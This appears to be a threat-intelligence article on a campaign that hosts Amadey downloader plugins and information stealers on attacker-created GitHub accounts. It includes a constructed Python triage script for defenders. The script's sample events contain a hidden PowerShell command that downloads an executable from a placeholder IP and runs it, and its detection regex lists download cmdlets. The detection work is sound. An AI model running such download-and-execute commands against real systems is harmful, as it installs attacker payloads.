Cybersecurity researchers have uncovered a concerning trend where threat actors are leveraging legitimate public GitHub repositories to host and distribute malicious payloads, bypassing traditional web filtering and exploiting the platform’s trusted nature. This campaign, observed in April 2025, heavily utilizes the Amadey malware, which functions as a downloader for various custom payloads. These payloads, including prominent information stealers like Lumma Stealer, RedLine Stealer, and Rhadamanthys Stealer, are discreetly stored on GitHub accounts created by the attackers, making detection more challenging. The use of fake GitHub accounts and the “malware-as-a-service” model highlight a persistent and evolving threat landscape.
The attack chain for these campaigns often begins with a malware loader named Emmenhtal (also known as PEAKLIGHT).
This loader is responsible for delivering Amadey, which then fetches additional malicious components from the attacker-created GitHub repositories. Interestingly, tactical similarities have been noted between this April 2025 campaign and a February 2025 email phishing campaign that also employed Emmenhtal, but for distributing SmokeLoader. While both Emmenhtal and Amadey serve as downloaders for secondary payloads, Amadey distinguishes itself with its ability to collect system information and its extensibility through DLL plugins, enabling advanced functionalities like credential theft and screenshot capture.
Cisco Talos’s investigation into the April 2025 campaign specifically identified three GitHub accounts—Legendary99999, DFfe9ewf, and Milidmdds—as being used to host Amadey plugins and other malicious scripts. These accounts have since been taken down. Analysis revealed that some JavaScript files within these repositories were identical to those used in the earlier SmokeLoader campaign, with the primary difference being the final payloads delivered. Furthermore, a Python script found in the repositories suggests an evolution of Emmenhtal, incorporating a PowerShell command to download Amadey directly from a hard-coded IP address, indicating an attempt to further streamline the malicious delivery process.
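As an added example (not code from the article or from Talos), the following defender-side triage runs over constructed process-creation records and flags PowerShell download commands whose target is either GitHub-hosted content or a bare IP address, the two hosting patterns described above; a scripting parent process (the Python-to-PowerShell hop mentioned) raises the severity. All host names, IPs, paths and log fields are made up for the example.

```python
import re
import ipaddress
from urllib.parse import urlparse

# Constructed EDR-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"pid": 4120, "parent": "python.exe", "image": "powershell.exe",
     "cmdline": 'powershell -w hidden -c "iwr http://203.0.113.45/update.exe '
                '-OutFile C:\\Users\\Public\\u.exe; Start-Process C:\\Users\\Public\\u.exe"'},
    {"pid": 4188, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -c "Invoke-WebRequest https://raw.githubusercontent.com/'
                'example-user/example-repo/main/plugin.dll -OutFile C:\\Users\\Public\\plugin.dll"'},
    {"pid": 4200, "parent": "explorer.exe", "image": "powershell.exe",
     "cmdline": 'powershell -c "Get-ChildItem C:\\Windows"'},           # benign, no download
    {"pid": 4210, "parent": "chrome.exe", "image": "chrome.exe",
     "cmdline": "chrome.exe https://github.com/example-user/example-repo"},  # not PowerShell
]

DOWNLOAD_CMDLETS = re.compile(
    r"(?i)\b(iwr|invoke-webrequest|downloadstring|downloadfile|curl|wget|start-bitstransfer)\b")
URL_RE = re.compile(r"https?://[^\s\"'<>;]+")
GITHUB_HOSTS = {"github.com", "raw.githubusercontent.com", "objects.githubusercontent.com"}
SCRIPT_PARENTS = {"python.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

def classify_url(url):
    """Return 'hardcoded_ip', 'github_hosted', or None for a URL."""
    host = urlparse(url).hostname or ""
    try:
        ipaddress.ip_address(host)
        return "hardcoded_ip"
    except ValueError:
        pass
    return "github_hosted" if host.lower() in GITHUB_HOSTS else None

def triage(event):
    """Return a finding dict for one event, or None if nothing matched."""
    if not event["image"].lower().endswith("powershell.exe"):
        return None
    cmd = event["cmdline"]
    if not DOWNLOAD_CMDLETS.search(cmd):
        return None
    reasons = [(kind, u) for u in URL_RE.findall(cmd) if (kind := classify_url(u))]
    if not reasons:
        return None
    severity = "high" if event["parent"].lower() in SCRIPT_PARENTS else "medium"
    return {"pid": event["pid"], "severity": severity, "reasons": reasons}

def triage_all(events):
    return [f for f in map(triage, events) if f]
```

In practice the same logic sits behind a SIEM rule over Sysmon event ID 1 or equivalent EDR telemetry; the regexes here are deliberately narrow so they stay readable.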
Beyond the GitHub-centric Amadey campaigns, the cybersecurity community has also detailed other sophisticated phishing operations. Trellix, for instance, uncovered a campaign propagating SquidLoader, a formidable malware loader equipped with advanced anti-analysis and anti-sandbox techniques, targeting financial institutions in Hong Kong, Singapore, and Australia. SquidLoader’s primary objective is to deploy a Cobalt Strike beacon for remote access and control, posing a significant threat due to its evasive capabilities and low detection rates. These diverse campaigns underscore a broader trend of highly evasive and adaptive attack methodologies.
The current threat landscape is further characterized by a wide array of social engineering tactics. These include financially motivated groups like UNC5952 leveraging invoice-themed emails to deliver remote access software like ConnectWise ScreenConnect, and attacks employing tax-related or U.S. Social Security Administration themes for credential harvesting. The prevalence of phishing kits, such as Logokit and custom Python Flask-based kits, along with the increasing use of QR codes and cloaking-as-a-service offerings like Hoax Tech, highlights the attackers’ ingenuity in bypassing security measures. The adoption of password-protected archive attachments in emails also enables threat actors to circumvent secure email gateways, further emphasizing the need for robust and multi-layered cybersecurity defenses.